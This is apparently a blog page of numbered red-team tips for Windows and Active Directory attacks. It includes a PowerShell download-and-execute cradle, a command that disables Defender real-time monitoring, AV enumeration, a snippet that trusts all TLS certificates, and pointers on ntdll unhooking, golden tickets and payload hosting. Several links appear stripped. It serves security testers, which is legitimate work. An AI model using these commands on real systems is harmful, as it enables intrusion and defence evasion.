Skip to content

Red Team Tips

#0: Need good blog posts/references? consider XPN’s Blog and Vincent Yui’s Red Team Tips

#1 The standard powershell downloadcradle (IEX New-Object….) is NOT proxy aware. A far superior alternative is the following one liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers… They are often overlooked, and can easily be exploited for RCE (think potato exploits). NETSPI is an expert in DB exploitation. I highly recommend powerupsql if you can manage to load powershell undetected.

#3 The command to list AV products is

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct


WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

#4 Only got CIFS TGS? you can still use sc to enable/disable/register new services on remote computers.

#5 The command to disable realtimonitoring is
Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).

#6 unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is

#7 In my honest opinion, is superior to mimikatz itself for reading out dumps and registry keys. It’s python based so works cross OS. pretty damn sweet.

#8. Don’t use SimpleHTTPServer anymore, use the much better UpDog instead (it has uploading functionalities!)

#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to prevent snooping eyes.

#10. Need a powershell web server for some reason? use this one!
it has script execution,command execution, and download functionalities

#11. You need quote escapes in powershell? there are a few different options, either use backslash (\) to escape quotes or use encodedcommands instead. pro tip, chaining powershell commands can be done, even incoded by just using “;” as a separator for commands. ex. whoami;whoami /priv

#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? use .bat files or .cmd files like so:

@echo off 
powershell.exe -noexit ## or any other powershell command you need.

#13. powershell script to c#? no problem!

#14. need to get rid of applocker (after you bypassed it initially)?

#15. Using Costura to package your c#? @cobbr says “Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies”

#16. @0gtweet tweeted an interesting thing: ” an undocumented -encodedarguments PowerShell parameter. It may be shortened to “ea” or “encodeda”.

#17. @mpgn_x64 said: Struggling with golden ticket and access denied ? Use ‘klist add_bind’ command after injecting your ticket with mimikatz or rubeus. (tweet)

#18. Ever needed to know what regkey is being edited by mdm or gpo? check this site:

#19. You’ll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\

#20. you can pass cmd args from explorer window, for example

#21 when using GadgetToJScript, use x86 payloads! also specifying the assembly is easier than compiling the CSharp as it imports the correct DLL’s automagically

#22 poweshell version 2 but having annoying SSL errors?

 [Net.ServicePointManager]::SecurityProtocol =  [Enum]::ToObject([Net.SecurityProtocolType], 3072)

add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy

#23 want to enum rdp sessions? use the qwinsta command

#24 want a nice overview of outdated operating systems when you have a bloodhound dump? use the neo4j webapplication and run this query:

MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*indows.*(2000|2003|2008|7|xp|vista|me).*' AND H.enabled = true RETURN,H.operatingsystem

#25 when configuring a DNS beacon, do not point the NS record to the IP, create an A record first, point the A record to the IP, then point the NS record to the A record.

#26 if you install another AV on a machine that has MDE installed it will turn itself off, but the health will remain Active. ¯\_(ツ)_/¯ could be interesting in a red team edge case I guess.… tip provided by @0xThiebaut

#27 wanna know which logon types generate creds that can be reused on target? (avoid double hop):